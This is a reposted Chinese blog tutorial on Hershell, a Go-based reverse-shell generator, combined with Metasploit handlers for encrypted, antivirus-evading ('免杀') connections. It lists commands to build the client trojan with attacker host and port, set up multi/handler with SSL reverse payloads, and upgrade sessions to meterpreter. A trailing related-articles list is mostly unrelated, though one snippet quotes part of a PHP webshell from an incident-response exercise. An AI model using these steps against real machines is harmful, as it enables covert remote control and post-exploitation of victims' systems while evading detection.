Hershell反向shell生成器+msf加密通信免杀

news/2025/3/14 19:43:09/文章来源:https://www.cnblogs.com/gongzb/p/18235685

转自:https://www.cnblogs.com/Chuantouli/p/12298579.html

简介 Hershell

1
Hershell(<a href="github.com/sysdream/hershell" target="_blank" rel="noopener">github.com/sysdream/hershell</a>)是基于golang开发的一款反向shell生成器,跨平台、流量加密、免杀效果较好  

环境配置

  安装golang,go get下载源码,切换到其目录

1
<em id="__mceDel">yum install golang<br>cd $HOME/go<br>go get github.com/sysdream/hershell<br>cd /root/go/src/github.com/sysdream/hershell</em>

使用操作

1、生成证书

1
make depends

2、生成客户端,运行后会生成hershell.exe,针对其不同平台使用不同方法的生成,修改其参数即可

1
make windows32 LHOST=服务端IP LPORT=监听端口

3、直接使用msf进行反连

1
use exploit/multi/handler<br>set payload python/shell_reverse_tcp_ssl<br>set lhost 服务端IP<br>set lport 服务端端口<br>set HandlerSSLCert ./server.pem<br>exploit -j

4、靶机运行客户端木马,成功上线

 

 

 5、hershell的shell自带没有很多功能,最好还是切换到强大的后渗透模块meterpreter,这里本来想使用session -u直接升级会话的,奈何没升级成功

 

 

 

6、另开一个会话启动msf监听

1
2
3
4
5
6
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 服务端ip
set lport 服务端端口
set HandlerSSLCert ./server.pem
exploit -j

7、hershell使用内置的meterpreter模块迁移,直接退出了会话,这里没明白为什么,和上面session转会话一样,感觉有点玄学,总之,这两种两种都可以来变成meterpreter会话

1
meterpreter https 服务端ip:服务端端口

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/721027.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

浏览器在局部区域全屏下,UI部分弹窗组件无法正常显示的问题

浏览器在局部区域全屏下,UI部分弹窗组件无法正常显示的问题

import screenfull from screenfull// 全屏 handleScreen() {//screenfull.isEnabled 此方法返回布尔值,判断当前能不能进入全屏if (!screenfull.isEnabled) {return false}//screenfull.toggle 此方法是执行全屏化操作。如果已是全屏状态,则退出全屏screenfull.toggle(this…
阅读更多...
word如何转换成pdf?这4种方法超实用!

word如何转换成pdf?这4种方法超实用!

在处理文档时,将Word文档转换为PDF格式是一种常见的需求。PDF格式具有跨平台、保持原始格式等优点,使得在不同设备和操作系统上查看和打印文档时保持一致性。那么word怎么转换成pdf呢?本文将介绍四种将Word文档转换为PDF的方法,以满足不同用户的需求。 方法一:使用Word自带…
阅读更多...
农业科技的丰收革命:农情监测系统引领农业数字化转型的浪潮

农业科技的丰收革命:农情监测系统引领农业数字化转型的浪潮

在科技飞速发展的今天,农业领域正经历着一场深刻的智能化、数字化变革。在这场变革中,农情监测系统以其独特的优势,成为推动农业转型升级的重要力量。它利用先进的物联网技术和云端平台,实现了对农业环境、病虫害等关键信息的实时、精准监测,为农业生产提供了强大的数据支…
阅读更多...
智慧运维,安全无忧:体验全新的机房管理方案

智慧运维,安全无忧:体验全新的机房管理方案

在数字化飞速发展的今天,机房作为信息时代的“心脏”,其稳定运行对于企业的业务连续性至关重要。然而,传统的机房运维模式面临着诸多挑战,如响应速度慢、故障定位难、资源浪费大等问题。智慧机房运维系统,它将以智能化、自动化的方式,为机房运维带来革命性的变革。在数字…
阅读更多...
OTA打包

OTA打包

./mk xxxxxxxxxxxx otapackage source build/envsetup.sh 启动编译脚本 lunch xxxxxxxxxxxx ota 升级打包 (项目有特制签名看着改) ./build/tools/releasetools/ota_from_target_files -k device/mediatek/security/releasekey -i a1.zip a2.zip update_8023.zip ./build/t…
阅读更多...
windows设置定时任务

windows设置定时任务

阅读更多...
戴尔R720服务器(4)虚拟机性能测试

戴尔R720服务器(4)虚拟机性能测试

物理机环境机型 戴尔R720系统环境 PVECPU E5-2660V2 2.2GHz 双路内存 1333MHz 单通道内存 1333MHz 双通道硬盘 用6块转速1万的2.5寸盘组的RAID5,使用了H310mini阵列卡‍测试工具:Sysbench。一个跨平台的基准测试工具,用于评估系统性能,包括CPU、内存、文件系统和数据库性…
阅读更多...
玄机应急响应-第一章

玄机应急响应-第一章

第一章 应急响应-webshell查杀 查杀方法1:d盾查杀查杀方法2:grep -nr "eval" .` 一,黑客webshell里面的flag flag <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&am…
阅读更多...
Alist个人自用自定义头部及内容

Alist个人自用自定义头部及内容

自定义头部:\3c p>/* 去除通知栏 右上角 X */\3c br> .notify-render .hope-close-button { } \3c /p> \3c p>/\3c em>白天背景图\3c /em>/\3c br> .hope-ui-light { } \3c br> /\3c em>夜间背景图\3c /em>/\3c br> .hope-ui-dark { } \3c br…
阅读更多...
5. 三重积分

5. 三重积分

掌握三重积分的定义,以及计算方法(如何将三重积分化为累次极分:穿线法和切片法)。掌握三重积分的换元法(柱面坐标变换和球面坐标变换)。 重点习题:例1、例3、例4-例6 注意:柱面坐标变换适用于积分区域为圆柱或圆柱的一部分,球坐标变换适用于积分区域为球或球的一部分,…
阅读更多...
麒麟系统VNC使用

麒麟系统VNC使用

阅读更多...
有哪些好用的私有化部署即时通讯软件?

有哪些好用的私有化部署即时通讯软件?

随着企业信息化建设的深入,越来越多的企业开始重视数据安全和内部沟通的效率。在这样的背景下,私有化部署即时通讯软件成为了众多企业的首选。这类软件不仅可以在企业内部建立稳定、安全的沟通渠道,还能根据企业需求进行定制开发,满足各种复杂的业务需求。今天,就为大家推…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023